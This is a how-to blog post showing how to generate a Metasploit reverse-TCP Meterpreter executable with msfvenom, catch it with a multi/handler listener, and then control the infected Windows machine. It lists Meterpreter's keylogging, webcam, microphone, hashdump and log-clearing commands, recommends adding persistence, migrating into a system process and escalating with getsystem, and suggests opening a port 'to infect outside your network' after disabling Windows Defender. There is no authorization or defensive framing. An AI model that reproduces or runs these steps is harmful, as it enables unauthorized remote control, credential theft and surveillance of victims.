I’ll be running simple tutorials from the beginning like this to catch new users up to speed. PentestBox is an Opensource PreConfigured Portable Penetration Testing Environment for the Windows Operating System.

PentestBox is not like any other Linux pentesting distribution which either runs in a virtual machine or on a dual boot environment. It essentially provides all the security tools as a software package and lets you run them natively on Windows. This effectively eliminates the requirement of virtual machines or dualboot environments on windows.

Let’s get started

Download and install PentestBox with metasploit from here: https://pentestbox.org/

Run it and install it to default root directory (C:/PentestBox) (you may need to disable windows defender as there are known CVEs in the directories).

Once installed, go to that folder and run PentestBox.exe

Now we create a RAT using metasploit. We wont even bother trying to crypt it. Type in ipconfig and note your IPv4 address, now click the green + button at the top right corner and click start to open another tab.

In the new tab type in the following or copy paste it. Replace LHOST=######## with LHOST=IPv4 such as LHOST=192.168.1.22

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=########### LPORT=4444 -o testfile.exe

Open another tab by pressing the green plus button, then start. Type in msfconsole (give it a minute, it will take its time and will pop an error first run).

Now type in the following, in the metasploit console:

use multi/handler
set payload windows/meterpreter/reverse_tcp

Replace IPV4 again with your IPv4 address.

set LHOST IPV4
set LPORT 4444
run

Now all you need to do is execute that file on a computer within your network. Simply run it on your own PC that you are currently using – navigate to the file you created which will be located here in this folder:

C:\PentestBox\bin\metasploit-framework

When you click run on the file that we called testfile.exe you will see a connection in your pentestbox. Now you have control there is so much you can do. Also yes you guessed it, simply open a port on your network and change the local IP for both the file and listening IP to infect outside your network.

Core Commands
=============

   Command                   Description
   -------                   -----------
   ?                         Help menu
   background                Backgrounds the current session
   bgkill                    Kills a background meterpreter script
   bglist                    Lists running background scripts
   bgrun                     Executes a meterpreter script as a background thread
   channel                   Displays information or control active channels
   close                     Closes a channel
   disable_unicode_encoding  Disables encoding of unicode strings
   enable_unicode_encoding   Enables encoding of unicode strings
   exit                      Terminate the meterpreter session
   get_timeouts              Get the current session timeout values
   guid                      Get the session GUID
   help                      Help menu
   info                      Displays information about a Post module
   irb                       Drop into irb scripting mode
   load                      Load one or more meterpreter extensions
   machine_id                Get the MSF ID of the machine attached to the session
   migrate                   Migrate the server to another process
   pivot                     Manage pivot listeners
   quit                      Terminate the meterpreter session
   read                      Reads data from a channel
   resource                  Run the commands stored in a file
   run                       Executes a meterpreter script or Post module
   sessions                  Quickly switch to another session
   set_timeouts              Set the current session timeout values
   sleep                     Force Meterpreter to go quiet, then re-establish session.
   transport                 Change the current transport mechanism
   use                       Deprecated alias for "load"
   uuid                      Get the UUID for the current session
   write                     Writes data to a channel


Stdapi: File system Commands
============================

   Command       Description
   -------       -----------
   cat           Read the contents of a file to the screen
   cd            Change directory
   checksum      Retrieve the checksum of a file
   cp            Copy source to destination
   dir           List files (alias for ls)
   download      Download a file or directory
   edit          Edit a file
   getlwd        Print local working directory
   getwd         Print working directory
   lcd           Change local working directory
   lls           List local files
   lpwd          Print local working directory
   ls            List files
   mkdir         Make directory
   mv            Move source to destination
   pwd           Print working directory
   rm            Delete the specified file
   rmdir         Remove directory
   search        Search for files
   show_mount    List all mount points/logical drives
   upload        Upload a file or directory


Stdapi: Networking Commands
===========================

   Command       Description
   -------       -----------
   arp           Display the host ARP cache
   getproxy      Display the current proxy configuration
   ifconfig      Display interfaces
   ipconfig      Display interfaces
   netstat       Display the network connections
   portfwd       Forward a local port to a remote service
   resolve       Resolve a set of host names on the target
   route         View and modify the routing table


Stdapi: System Commands
=======================

   Command       Description
   -------       -----------
   clearev       Clear the event log
   drop_token    Relinquishes any active impersonation token.
   execute       Execute a command
   getenv        Get one or more environment variable values
   getpid        Get the current process identifier
   getprivs      Attempt to enable all privileges available to the current process
   getsid        Get the SID of the user that the server is running as
   getuid        Get the user that the server is running as
   kill          Terminate a process
   localtime     Displays the target system local date and time
   pgrep         Filter processes by name
   pkill         Terminate processes by name
   ps            List running processes
   reboot        Reboots the remote computer
   reg           Modify and interact with the remote registry
   rev2self      Calls RevertToSelf() on the remote machine
   shell         Drop into a system command shell
   shutdown      Shuts down the remote computer
   steal_token   Attempts to steal an impersonation token from the target process
   suspend       Suspends or resumes a list of processes
   sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

   Command        Description
   -------        -----------
   enumdesktops   List all accessible desktops and window stations
   getdesktop     Get the current meterpreter desktop
   idletime       Returns the number of seconds the remote user has been idle
   keyscan_dump   Dump the keystroke buffer
   keyscan_start  Start capturing keystrokes
   keyscan_stop   Stop capturing keystrokes
   screenshot     Grab a screenshot of the interactive desktop
   setdesktop     Change the meterpreters current desktop
   uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

   Command        Description
   -------        -----------
   record_mic     Record audio from the default microphone for X seconds
   webcam_chat    Start a video chat
   webcam_list    List webcams
   webcam_snap    Take a snapshot from the specified webcam
   webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands
======================

   Command       Description
   -------       -----------
   getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

   Command       Description
   -------       -----------
   hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

   Command       Description
   -------       -----------
   timestomp     Manipulate file MACE attributes

meterpreter >

I’d of course recommend adding persistence using the following:

run persistence -X -U -A -L %TEMP% -i 5 -r ######### -p ####

Replace ######## with your IPV4 and #### with your port (4444).

Then try do something fun like:

hashdump

If hashdump doesn’t work, you might need to migrate to a system process. To do that simply:

ps

Then look for a system process and its ID such as svchost.exe – mine is 11528:

migrate 11528

Make sure to use getsystem to elevate privileges:

getsystem
getprivs
Dawood Khan
Geek, Blogger, Political Activist, Green building lover, The Housing Bubble. I feed my cats poptarts. And fairy tales are full of shit.

You may also like

Comments

Leave a Reply

More in How-to